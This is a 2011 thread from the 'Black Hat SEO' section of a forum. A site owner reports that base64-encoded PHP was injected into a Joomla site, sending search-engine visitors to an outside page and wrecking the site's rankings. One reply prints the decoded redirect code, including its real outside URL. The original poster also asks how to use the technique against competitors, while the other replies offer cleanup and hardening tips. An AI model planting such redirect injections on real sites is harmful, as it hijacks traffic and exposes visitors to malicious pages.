1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

A malware injection that make ur site/competitor's site lose it's ranking on big G

Discussion in 'Black Hat SEO' started by Raven13, Sep 14, 2011.

  1. Raven13

    Raven13 Power Member

    Joined:
    May 31, 2011
    Messages:
    635
    Likes Received:
    402
    Occupation:
    Online Business coaching & Consulting.
    Location:
    Location independant (Now: Rio de janeiro)
    Home Page:
    Hello guys,

    Recently I've faced this probleme on one of my sites built with Joomla, so i want to share this with the community as it's related to SEO. Somebody injected me this code to all my PHP pages:
    it's coded with base64!

    All my keyword that was ranking on the top 5 gonne to the 5th page!!! And when somebody type a keyword related to my niche and click on the result on google he's automaticaly redirected to this page:

    I really don't know how they've done to inject this to my site... Anyone here knows how can I do to avoid this by the future?
    And how can we do this?
    It's a great silent weapon, you can't know that ur site is infected ur site drope in the serp and u can't know it until u click on the result on google to see the catastrophe!!!


    PS: Sorry for my bad english.
     
  2. jcbizzled

    jcbizzled Registered Member

    Joined:
    Aug 23, 2010
    Messages:
    50
    Likes Received:
    12
    Hi,

    I've run into this sort of thing before on Wordpress sites, but knowing how it happened is difficult. Usually it is a result of a poorly written (vulnerable) plugin or theme implementation. A quick fix you could do to prevent it while you investigate further is to remove the write bit on your files to prevent your apache/webserver/etc processes from being able to make any changes to anything.

    This is what the decoded code is running. As you noted, it basically looks like they're just redirecting your traffic if the referrer is from yahoo, google, msn, ... so they're effectively stealing your traffic and probably your seo juice as well.

    Code:
    
    error_reporting(0);
    $nccv=headers_sent();
    if (!$nccv){
    $referer=$_SERVER['HTTP_REFERER'];
    $ua=$_SERVER['HTTP_USER_AGENT'];
    if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
    	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
    		header("Location: http://www.liaekim.com.br/site/includes/js/wz_uye.html");
    		exit();
    	}
    }
    
     
    Last edited: Sep 14, 2011
  3. Raven13

    Raven13 Power Member

    Joined:
    May 31, 2011
    Messages:
    635
    Likes Received:
    402
    Occupation:
    Online Business coaching & Consulting.
    Location:
    Location independant (Now: Rio de janeiro)
    Home Page:
    Thanks for your reply dude!
    And what do you suggest me to do exactly please to avoid this kind of injections by the future? I already removed everything on all the infected files with Notepad++. I change the CHMOD on those files? I add something? Help will be really appreciated :)
     
  4. sheiky

    sheiky Newbie

    Joined:
    Jun 6, 2011
    Messages:
    4
    Likes Received:
    0
    Home Page:
    I too got attacked with the "Eval" code recently. I installed WP security scan and antivirus plugins to check and fixed few things given below:

    Even though the code resided inside the .js files of couple of plugins and functions.php inside my theme files.

    I found the Eval code inside the plugins and removed the entire plugin directory:

    sexylightbox.v2.1.mootools.min.js file inside wp-emailfeedburnerpopup plugin folder got infected (Sexy LightBox wordpress plugin)

    jquery.MultiFile.pack.js file inside nextgen-gallery/admin got infected

    Also found the script inside current theme/functions.php and removed it.

    Now everything is working fine..Better we have to have WP security scan and Antivirus plugins to monitor the site.

    Thanks for your advice...:)
     
  5. sniper272

    sniper272 Regular Member

    Joined:
    Sep 18, 2008
    Messages:
    397
    Likes Received:
    77
    had the same thing happen to all three of my sites its from malware on the pc i got it from limewire all of my sites moved back to #2,#3 and #2 spots after i removed it from like 15 different pages on each site and then logged into google webmasters to inform them that i had removed them, then a bot will automatically check your site to see if it has all been removed
     
  6. Raven13

    Raven13 Power Member

    Joined:
    May 31, 2011
    Messages:
    635
    Likes Received:
    402
    Occupation:
    Online Business coaching & Consulting.
    Location:
    Location independant (Now: Rio de janeiro)
    Home Page:
    Have you got the same prob? redirecting to the same site?
     
  7. sandrine10

    sandrine10 Power Member

    Joined:
    Apr 14, 2010
    Messages:
    621
    Likes Received:
    63
    Location:
    CyberLand
    hey raven13 have you solve the problem if yes please tel us how?how knows we will be face on the same issue.
     
  8. scriptomania

    scriptomania Junior Member

    Joined:
    Dec 28, 2010
    Messages:
    127
    Likes Received:
    249
    Occupation:
    A full time pirate at sea
    Location:
    The European capital of politics
    Lesson: don't download nulled themes/scripts kids. /jk
     
  9. bytzu

    bytzu Registered Member

    Joined:
    Jun 30, 2011
    Messages:
    96
    Likes Received:
    138
    Try searching on 'exploit database' (google it i can not post links yet) for example the list of components or plugins you are using for your websites. Usually it gets listed there when a new exploit for a joomla / wordpress component or plugin is found. Try to update to latest version.
     
  10. Corydoras007

    Corydoras007 Regular Member

    Joined:
    Sep 17, 2012
    Messages:
    303
    Likes Received:
    53
    jcbizzled,

    Just curious but what did you use to decode the code?

    Thanks.

    Nevermind... for those who have similar questions, check this site out to decode such codes

    perishablepress dot com/tools/decoder/index.php
     
    Last edited: Nov 14, 2012
  11. timgraham

    timgraham Newbie

    Joined:
    Nov 11, 2012
    Messages:
    48
    Likes Received:
    4
    Check your .htaccess file also. I got injected and it kept writing redirects in the .htaccess file.
    The redirect script would check the referrer against around 10 of the biggest sites like google, facebook etc and if it was one of those, it would redirect to a malware site Russia.